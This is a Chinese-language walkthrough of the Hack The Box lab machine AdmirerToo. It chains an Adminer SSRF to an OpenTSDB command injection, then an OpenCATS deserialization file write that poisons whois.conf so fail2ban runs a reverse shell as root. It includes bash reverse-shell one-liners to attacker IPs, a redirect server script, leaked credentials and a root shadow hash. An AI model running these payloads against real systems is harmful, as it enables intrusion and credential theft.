基本信息

端口扫描

需要全端口扫描,本地扫非常慢,建议开pwnbox,并且注意扫描选项:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
sudo nmap -p- -sF -v 10.10.11.137

Nmap scan report for 10.10.11.137
Host is up (0.0021s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE         SERVICE
22/tcp    open|filtered ssh
80/tcp    open|filtered http
4242/tcp  filtered      vrml-multi-use
16010/tcp open|filtered unknown
16030/tcp open|filtered unknown

sudo nmap -sC -sV -sF -p22,80,4242,16010,16030 10.10.11.137
└──╼ [★]$ sudo nmap -sC -sV -sF -p22,80,4242,16010,16030 10.10.11.137
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-28 08:21 GMT
Nmap scan report for 10.10.11.137
Host is up (0.0021s latency).

PORT      STATE         SERVICE        VERSION
22/tcp    open          ssh            OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 99:33:47:e6:5f:1f:2e:fd:45:a4:ee:6b:78:fb:c0:e4 (RSA)
|   256 4b:28:53:64:92:57:84:77:5f:8d:bf:af:d5:22:e1:10 (ECDSA)
|_  256 71:ee:8e:e5:98:ab:08:43:3b:86:29:57:23:26:e9:10 (ED25519)
80/tcp    open          http           Apache httpd 2.4.38 ((Debian))
|_http-title: Admirer
|_http-server-header: Apache/2.4.38 (Debian)
4242/tcp  filtered      vrml-multi-use
16010/tcp open|filtered tcpwrapped
16030/tcp open|filtered tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.14 seconds

80

子域名

任意不存在的路径,404页面邮箱地址得到域名:

加入hosts后,扫描子域名,发现一个db:

1
2
3
4
5
10.10.11.137 admirer-gallery.htb

gobuster vhost -u http://admirer-gallery.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 50 -r

Found: db.admirer-gallery.htb (Status: 200) [Size: 2569]

加入hosts后访问:

Adminer

预设置账号密码,进去里面没什么有用信息:

1
2
3
4
5
6
<input type="hidden" name="auth[driver]" value="server">
								<input type="hidden" name="auth[server]" value="localhost">
								<input type="hidden" name="auth[username]" value="admirer_ro">
								<input type="hidden" name="auth[password]" value="1w4nn4b3adm1r3d2!">
								<input type='hidden' name="auth[db]" value="admirer"/>
								<input type='hidden'

SSRF

可以搜到Adminer的SSRF

SSRF to opentsdb

Adminer可以使用其他driver,例如elestic,修改driver,使用脚本重定向,可以访问到4242端口的opentsdb:

OpenTSDB getshell

opentsdb存在已知漏洞,后面就是一步步打:

1
2
3
4
5
6
7
8
9
10
11
12
python redirect.py -i 10.10.14.10 --port 7777 http://127.0.0.1:4242/api/version

"version":"2.4.0"

python redirect.py -i 10.10.14.10 --port 7777 http://127.0.0.1:4242/api/suggest?type=metrics

["http.stats.web.hits"]

bash -c 'exec bash -i &>/dev/tcp/10.10.14.10/4444 <&1'
%22bash%20-c%20'exec%20bash%20-i%20%26%3E/dev/tcp/10.10.14.10/4444%20%3C%261'%22

python redirect.py -i 10.10.14.10 --port 7777 "http://127.0.0.1:4242/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:http.stats.web.hits&o=&ylabel=&xrange=10:10&yrange=%5B33:system(%22bash%20-c%20'exec%20bash%20-i%20%26%3E/dev/tcp/10.10.14.10/4444%20%3C%261'%22)%5D&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"

password

搜索可能存在密码配置的文件:

1
2
3
4
5
grep -iRl 'pass' /var/www/adminer/ 2>/dev/null
/var/www/adminer/plugins/data/servers.php
/var/www/adminer/plugins/oneclick-login.php
/var/www/adminer/plugins/plugin.php
/var/www/adminer/adminer-included-0ae90598f37b20e3e7eb122c427729ed.php

/var/www/adminer/plugins/data/server.php中获得很复杂的密码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
<?php
return [
  'localhost' => array(
//    'username' => 'admirer',
//    'pass'     => 'bQ3u7^AxzcB7qAsxE3',
// Read-only account for testing
    'username' => 'admirer_ro',
    'pass'     => '1w4nn4b3adm1r3d2!',
    'label'    => 'MySQL',
    'databases' => array(
      'admirer' => 'Admirer DB',
    )
  ),
];

redirect.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
#!/usr/bin/env python

import SimpleHTTPServer
import SocketServer
import sys
import argparse

def redirect_handler_factory(url):
    """
    Returns a request handler class that redirects to supplied `url`
    """
    class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
       def do_GET(self):
           self.send_response(301)
           self.send_header('Location', url)
           self.end_headers()

       def do_POST(self):
           self.send_response(301)
           self.send_header('Location', url)
           self.end_headers()

    return RedirectHandler


def main():

    parser = argparse.ArgumentParser(description='HTTP redirect server')

    parser.add_argument('--port', '-p', action="store", type=int, default=80, help='port to listen on')
    parser.add_argument('--ip', '-i', action="store", default="", help='host interface to listen on')
    parser.add_argument('redirect_url', action="store")

    myargs = parser.parse_args()

    redirect_url = myargs.redirect_url
    port = myargs.port
    host = myargs.ip

    redirectHandler = redirect_handler_factory(redirect_url)

    handler = SocketServer.TCPServer((host, port), redirectHandler)
    print("serving at port %s" % port)
    handler.serve_forever()

if __name__ == "__main__":
    main()

user flag

得到的密码就是jennifer用户ssh密码:

1
2
jennifer
bQ3u7^AxzcB7qAsxE3

提权信息

opencats

本地8080端口另一个web,转发出来:

1
ssh -L 8888:localhost:8080 jennifer@10.10.11.137

这个版本存在已知漏洞:

services

service里有fail2ban

1
2
3
4
5
6
7
8
9
10
11
12
systemctl list-units --type=service

...
fail2ban.service                loaded active running Fail2Ban Service
...

jennifer@admirertoo:~$ fail2ban-server -V
Fail2Ban v0.10.2

Copyright (c) 2004-2008 Cyril Jaquier, 2008- Fail2Ban Contributors
Copyright of modifications held by their respective authors.
Licensed under the GNU General Public License v2 (GPL).

opencats

database

/opt/opencats/config.php里可以得到数据库账号密码,admin hash破解不出来,但可以直接修改:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/* Database configuration. */
define('DATABASE_USER', 'cats');
define('DATABASE_PASS', 'adm1r3r0fc4ts');
define('DATABASE_HOST', 'localhost');
define('DATABASE_NAME', 'cats_dev');

MariaDB [cats_dev]> select user_name,password,user_id from user\G
*************************** 1. row ***************************
user_name: admin
 password: dfa2a420a4e48de6fe481c90e295fe97
  user_id: 1
*************************** 2. row ***************************
user_name: cats@rootadmin
 password: cantlogin
  user_id: 1250
*************************** 3. row ***************************
user_name: jennifer
 password: f59f297aa82171cc860d76c390ce7f3e
  user_id: 1251
3 rows in set (0.001 sec)

password123
MariaDB [cats_dev]> update user set password = '482c811da5d5b4bc6d497ffa98491e38' where user_id = 1;

反序列化任意写文件

测试反序列化,发现可以以devel权限写文件,devel不能登录,但有权限写/usr/local/etc配置文件目录

1
2
3
4
5
6
7
8
9
10
11
./phpggc -u --fast-destruct Guzzle/FW1 /dev/shm/test.txt ./test.txt

jennifer@admirertoo:~$ ls -al /dev/shm/test.txt
-rw-r--r-- 1 devel devel 56 Jan 28 07:06 /dev/shm/test.txt
jennifer@admirertoo:~$ grep 'devel' /etc/passwd
devel:x:1003:1003::/home/devel:/sbin/nologin
jennifer@admirertoo:~$ find / -group devel 2>/dev/null
/dev/shm/test.txt
/opt/opencats/INSTALL_BLOCK
/usr/local/src
/usr/local/etc

Fail2Ban

查看配置,可以知道默认对ssh配置了fail2ban,当有ip被ban时会触发邮件:

根据github中漏洞描述,我们可以通过控制whois响应获得命令执行,虽然我们不能修改/etc/hosts,但可以通过opencats的反序列化写whois配置文件,但会被写入一些其他数据:

根据文档闭合,从而控制whois服务器:

1
}]|. [10.10.14.12]

Exploit & root flag

整个流程就是反序列化写whois配置文件控制whois server,控制whois响应为reverse shell,ssh触发fail2ban从而触发代码执行,获得shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
./phpggc -u --fast-destruct Guzzle/FW1 /usr/local/etc/whois.conf  ./test.txt

# rshell file
~| bash -c "bash -i >& /dev/tcp/10.10.14.12/4444 0>&1" &

# whois server
ncat -nvlkp 43 -c "cat ./rshell"

jennifer@admirertoo:~$ whois 10.10.14.12
~| bash -c "bash -i >& /dev/tcp/10.10.14.12/4444 0>&1" &

ssh root@10.10.11.137

cat /etc/shadow
root:$6$eP5MVyB1lXtVQgzU$H4xJdGiHfSu9JmUR80juqHC5BAca79yir2Z6bipW8s.DowTuNRo82/CjN7EMBK8lczD1AMYxgKTIp79DjN2R31:18817:0:99999:7:::

参考资料